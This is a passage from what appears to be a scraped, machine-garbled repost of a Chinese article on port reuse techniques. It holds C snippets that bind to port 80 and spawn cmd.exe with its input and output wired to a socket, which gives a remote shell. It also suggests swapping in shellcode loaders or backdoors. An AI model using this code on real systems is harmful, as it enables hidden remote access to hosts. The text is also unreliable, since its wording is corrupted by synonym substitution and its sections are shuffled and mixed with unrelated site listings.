在这个中,也有例外,比如apache和其他运行在应用层上的办事器中心件,在他们开放的端口上是可以进行端口复竽暌姑的,不过如许,端口复竽暌姑典范领巾小了很多。
设置IP和复竽暌姑端标语,IP和端标语视情况而定。
- sockaddr_in sockaaddr;
- sockaaddr.sin_addr.s_addr = inet_addr("192.168.1.8");
- sockaaddr.sin_family = AF_INET;
- sockaaddr.sin_port = htons(80);
设置反弹的法度榜样,以 cmd.exe 为例,起首创建窗口特点并初始化为 CreateProcess() 创建过程做预备,当 cmd.exe 的过程创建成功后,以 socket 进行数据通信交换,这里还可以换成其他法度榜样,比如 Shellcode 小马接收器、写入文件法度榜样、后门等等。
- STARTUPINFO si;
- ZeroMemory(&si, sizeof(si));
- si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
- si.hStdError = si.hStdInput = si.hStdOutput = (void*)recvSock;
- char cmdLine[] = "cmd";
- PROCESS_INFORMATION pi;
- ret = CreateProcess(NULL, cmdLine, NULL, NULL, 1, 0, NULL, NULL, &si, π);
0x05总结
在端口复竽暌姑技巧中,确切有很多的坑点。其实只要我们知道个中的特点,绕过也是不难的。端口复竽暌姑在Linux体系中我认为还好,然则端口复竽暌姑这个技巧放到Windows体系中,我认为端口复竽暌姑就似乎是千斤顶,换备胎的时刻可以用下,弗成长时光应用,不然会出现问题的(^__^)。
【编辑推荐】
- 老难题新思路:移动开辟策略——原生与混淆孰优孰劣?
- 移动开辟每周浏览清单:iOS多线程安然、构建Android MVVM应用框架
- 移动开辟第五:新法度榜样员最爱好的6种岗亭
- 移动开辟主流框架的拔取以及技巧选型筹划解析
- 为安卓开辟者介绍的移动开辟框架 Flutter
0x04 端口复竽暌姑源码分析
推荐阅读
Netcraft 10月Web服务器排名:Nginx首超微软排第二
Netcraft 宣布了2017年10月 Web 办事器查询拜访申报,本月 Netcraft一共统计了1,815,237,491 个站点和 6,886,362 台收集计算机,排名前三的依然是 Microsoft、Apache 和 nginx 。在 10 月>>>详细阅读
本文标题:聊聊端口复用的实现和坑点
地址:http://www.17bianji.com/lsqh/38630.html
1/2 1